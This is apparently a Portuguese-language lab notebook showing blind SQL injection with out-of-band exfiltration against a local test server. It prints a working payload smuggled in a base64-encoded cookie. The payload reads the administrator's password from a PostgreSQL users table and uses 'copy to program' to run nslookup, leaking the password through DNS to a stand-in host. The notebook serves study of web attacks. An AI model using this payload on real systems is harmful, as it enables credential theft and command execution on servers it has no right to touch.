## SQL Injection - Blind SQL injection with out-of-band data exfiltration

XXE - XML external entity injection

SQL Injection and DNS Lookup with Data Exfiltration

A aplicação processa um XML e não se protege de injeções de códigos/dados XML externos.
Tipo de ataque pode escalar para SSRF - Server side request forgery 

Vamos ver como está o header do request/response do site:

In [40]:
import requests

x = requests.get('http://127.0.0.1:8000/')

print(x.headers)

{'date': 'Fri, 21 Oct 2022 17:21:25 GMT', 'server': 'uvicorn', 'content-length': '856', 'content-type': 'text/html; charset=utf-8', 'set-cookie': 'TrackingId=MTE3ZDFlYWEtODc0Yy00Mzc0LWFlOGUtZjk0ZWU4NzcxOTZl; Path=/; SameSite=lax'}


Vamos ter que fazer o cookie ir codificado em base64, pois precisamos injetar um SQL para o Postgres que usa ";" como terminador de comando; porém cookies não aceitam ";". Esse processo só funcionará se o sistema usar base64 nos cookies.

In [41]:
import base64

def base64_encode_str(str):
    str_bytes = str.encode("ascii")
    base64_bytes = base64.b64encode(str_bytes)
    base64_string = base64_bytes.decode("ascii")
    return base64_string

Aqui faremos a injeção do SQL através do cookie:

In [39]:
cookies = {'TrackingId': base64_encode_str("""585a9538-00a0-4816-9774-ff30f4e50c84';
            do $$ 
            declare c text; 
            declare p text;  
            begin 
            SELECT into p (SELECT password FROM users WHERE users.name = 'administrator'); 
            raise notice 'Password: %', p;
            c := 'copy (SELECT '''') to program ''nslookup -port=8053 '||p||'.dns_faker dns_faker'''; 
            execute c; 
            END; 
            $$; --""")}

x = requests.get('http://127.0.0.1:8000/', cookies=cookies)


O resultado deve ser pego no servidor de DNS, aqui no caso no log do container DNS_FAKER